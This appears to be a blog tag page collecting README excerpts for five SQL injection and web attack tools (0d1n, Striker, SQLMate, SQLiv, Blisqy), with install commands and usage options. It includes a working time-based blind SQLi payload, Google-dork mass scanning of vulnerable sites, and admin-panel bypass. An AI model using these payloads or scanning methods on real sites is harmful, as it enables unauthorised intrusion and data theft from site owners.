Termux ID: SQLi -->

    Social Items

Home / SQLi

Web security tool to make fuzzing at HTTP inputs, made in C with libCurl. 0d1n is a tool for automating customized attacks against web applications.

You can do:
  • Brute force passwords in auth forms
  • Directory disclosure ( use PATH list to brute, and find HTTP status code )
  • Test list on input to find SQL Injection and XSS vulnerabilities
  • Options to load ANTI-CSRF token each request
  • Options to use random proxy per request
  • Other functions...



To run:

require libcurl-dev or libcurl-devel(on rpm linux based)
$ git clone https://github.com/CoolerVoid/0d1n/
need libcurl to run
$ sudo apt-get install libcurl-dev
if rpm distro
$ sudo yum install libcurl-devel
$ make
$./0d1n

0d1n v2.5 - Web Security Tool to Make Fuzzing at HTTP/S


Striker is an offensive information and vulnerability scanner.

Features
Just supply a domain name to Striker and it will automatically do the following for you:
  • Check and Bypass Cloudflare
  • Retrieve Server and Powered by Headers
  • Fingerprint the operating system of Web Server
  • Detect CMS (197+ CMSs are supported)
  • Launch WPScan if target is using Wordpress
  • Retrieve robots.txt
  • Check if the target is a honeypot
  • Port Scan with banner grabbing
  • Dumps all kind of DNS records
  • Generate a map for visualizing the attack surface
  • Gather Emails related to the target
  • Find websites hosted on the same web server
  • Find hosts using google
  • Crawl the website for URLs having parameters
  • SQLi scan using online implemention of SQLMap (takes < 3 min.)
  • Basic XSS scanning

Screenshots





Striker - Offensive Information And Vulnerability Scanner


There are some features that we think SQLMap should have. Like finding admin panel of the target, better hash cracking etc. If you think the same, SQLMate is for you.

What it does?
  • Feed it a SQL injection dork via --dork option and it will find vulnerable sites for you. After that, it will try to find their admin panels and also try to bypass them with SQL queries.
  • It can do very fast hash lookups for MD5, SHA1 and SHA2. You can supply a hash with --hash option. Average lookup takes less than 2 seconds.
  • You can also supply it a txt file containing hashes to be cracked with --list option.
  • The first mode just checks for 13 most common admin panel locations but if you feed a website through --admin option, you can do a full scan using 482 paths.
  • SQLMate has ability to scrap dorks as well. Specify dumping level via --dump option. Using --dump 1 will dump nearly 20 dorks so set the level anywhere between 1-184 as per your needs. SQLMate automatically saves the dorks into a txt file so you can use them later.
Scroll down for more.

Screenshots




Running SQLMate
Enter the following command in terminal to download SQLMate
git clone https://github.com/UltimateHackers/sqlmate
Then navigate to the sqlmate directory by entering this command
cd sqlmate
Now install the required modules
pip install -r requirements.txt
Now run sqlmate
python sqlmate

Available command line options
usage: sqlmate [-h] [--dork DORK] [--hash HASH] [--list <path>]
 [--dump 1-184] [--admin URL] [--type PHP,ASP,HTML]

optional arguments:
  -h, --help            show this help message and exit
  --dork DORK           Supply a dork and let SQLMate do its thing
  --hash HASH           'Crack' a hash in 5 secs
  --list <path>         Import and crack hashes from a txt file
  --dump 1-184          Get dorks. Specify dumping level. Level 1 = 20 dorks
  --admin URL           Find admin panel of website
  --type PHP,ASP,HTML   Choose extension to scan (Use with --admin option,
            Default is all)


sqlmate - Tool which will do what you always expected from SQLmap


Massive SQL injection vulnerability scanner.

Features
  1. multiple domain scanning with SQL injection dork by Bing, Google, or Yahoo
  2. targetted scanning by providing specific domain (with crawling)
  3. reverse domain scanning
both SQLi scanning and domain info checking are done in multiprocessing
so the script is super fast at scanning many urls

quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom

 Installation
  1. git clone https://github.com/Hadesy2k/sqlivulscan.git
  2. sudo python2 setup.py -i
Dependencies
Pre-installed Systems

Quick Tutorial
1. Multiple domain scanning with SQLi dork
  • it simply search multiple websites from given dork and scan the results one by one
python sqliv.py -d <SQLI DORK> -e <SEARCH ENGINE>  
python sqliv.py -d "inurl:index.php?id=" -e google
2. Targetted scanning
  • can provide only domain name or specifc url with query params
  • if only domain name is provided, it will crawl and get urls with query
  • then scan the urls one by one
python sqliv.py -t <URL>  
python sqliv.py -t www.example.com  
python sqliv.py -t www.example.com/index.php?id=1
3. Reverse domain and scanning
  • do reverse domain and look for websites that hosted on same server as target url
python sqliv.py -t <URL> -r
View help
python sqliv.py --help

usage: sqliv.py [-h] [-d D] [-e E] [-p P] [-t T] [-r]

optional arguments:
  -h, --help  show this help message and exit
  -d D        SQL injection dork
  -e E        search engine [Google only for now]
  -p P        number of websites to look for in search engine
  -t T        scan target website
  -r          reverse domain

Screenshots


Contributors
blackvkng
the-c0d3r

SQLiv - Massive SQL Injection Vulnerability Scanner


A slow data siphon for MySQL/MariaDB using bitwise operation on printable ASCII characters, via a blind-SQL injection.

Usage
USAGE:
blisqy.py --server <Web Server> --port <port> --header <vulnerable header> --hvalue <header value> 
          --inject <point of injection>  --payload <custom sql payload> --dig <yes/no> --sleeptime <default 0.5>

Options:
  -h, --help            show this help message and exit
  --server=WEBSERVER    Specify host (web server) IP
  --port=PORT           Specify port
  --header=VULNHEADER   Provide a vulnerable HTTP Header
  --hvalue=HEADERVALUE  Specify the value for the vulnerable header
  --inject=INJECTION    Provide where to inject Sqli payload
  --payload=PAYLOAD     Provide SQL statment/query to inject as payload
  --dig=DIGGER          Automatic Mysql-Schema enumeration (takes time!)
  --sleeptime=SLEEP     Sleep-Time for blind-SQLi query (default : 0.5)
  --interactive=INTERACT
                        Turn interactive mode on/off (default : off)

Basics
Blisqy will assit you enumerate a MySQL/Maria DB after finding a Time-Based Blind Sql injection vulnerability on a web server. Currently, it supports injections on HTTP Headers. You should have identified a potential Blind Sql injection vulnerability on a Webserver as demonstrated on Pentester-Lab (From SQL Injection to Shell II)
So you can't run Blisqy without :
  • --server : the vulnerable Webserver
  • --port : Which port is the webserver running on?
  • --header : the identified vulnerable HTTP header
  • --hvalue : value for the identified vulnerable HTTP header
and most imporntatly --inject : what to inject after the hvalue (SQLi Payload).

Options :

--inject
After identifying a Time-Based BlindSQL injection on a web-server, this option enables the user craft and insert SQL-injection payloads. The value for this option should look like this :
--inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
Where
  • *sql* - is where SQL Payloads will be inserted and
  • *time* - is where Time-Based test will be inserted.

--sleeptime
Blisqy now accepts user set --sleeptime and it's inserted on --inject *time*. Always make sure you have fine tuned this value to resonates with your environment and network lantency.... Otherwise you'll be toased! (the lower the value, the faster we go). E.g. --sleeeptime 0.1

--payload
This option allows the user run their own custom SQL-injection payloads. Other options like --dig and --interactive MUST not be set (should be ignored) for this option to run.

Example :
Command
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" 
           --sleeptime 0.1 
           --inject "' or if((*sql*),sleep(*time*),0) and '1'='1" 
           --payload "select @@hostname"


--interactive
This option accept two values i.e on or off and it compliments option --dig (this option must be set to yes). If set as --interactive on the user will get to choose which discovered table to enumerate and decide if data from the table should be dumped or not. When set as "--interactive off", every table gets enumerated and all data dumped.

Getting data from a Table :
The user can decide which columns to extract data from when --interactive is set on. The format looks something like this : column1*column1*column2 - just the column names separated by an asterisk. User can also avoid data collection on a particular table by entering skip instead of the column names.

Example :
Command
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" --dig yes 
            --sleeptime 0.1 --interactive on --inject "' or if((*sql*),sleep(*time*),0) and '1'='1"



Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)

Subscribe to: Posts (Atom)